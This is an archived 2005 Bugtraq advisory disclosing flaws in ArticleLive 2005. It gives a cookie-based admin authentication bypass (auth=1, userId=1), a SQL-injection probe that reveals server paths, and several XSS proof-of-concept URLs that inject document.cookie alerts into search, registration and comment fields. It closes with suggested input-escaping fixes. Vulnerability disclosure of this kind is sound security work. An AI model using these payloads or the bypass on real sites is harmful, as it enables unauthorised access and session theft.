lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 3 May 2005 20:55:27 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Authentication bypass, sql injections and xss in ArticleLive 2005




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

***SPECIAL OFFER***
Hire my auditing services, if I dont find anything, its FREE..!! http://www.digitalparadox.org/services.ah

Looking for Publishers intrested in my Php Secure Coding Book.


Severity: High
Title: Authentication bypass, sql injections and xss in ArticleLive 2005
Date: 04/05/2005

Vendor: Interspire
Vendor Website: http://www.interspire.com/articlelive/
Summary: There are, authentication bypass, sql injections and xss in articlelive 2005.


Proof of Concept Exploits: 

http://www.example.com/admin/?
Full administrative authentication bypass

In the control panel, by setting your cookie to auth=1 and userId=1 would give you full administrative access.


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='Information DisclosureCategories=0
Full Path Disclosure

Warning: Wrong datatype for second argument in call to in_array in 
/home/httpd/vhosts/example.com/httpdocs/admin/includes/classes/class.category.php on line 460

Warning: Bad arguments to implode() in /home/httpd/vhosts/example.com/httpdocs/templates/Default 
(Stretched)/Panels/SearchResultsPanel.php on line 163


http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&LastName=&Email=&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&Email=&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&Biography=dcrab&Picture=dcrab
XSS


http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
XSS


http://www.example.com/blogs/newcomment/?BlogId='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;
XSS


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input 
validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel 
free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.


Powered by blists - more mailing lists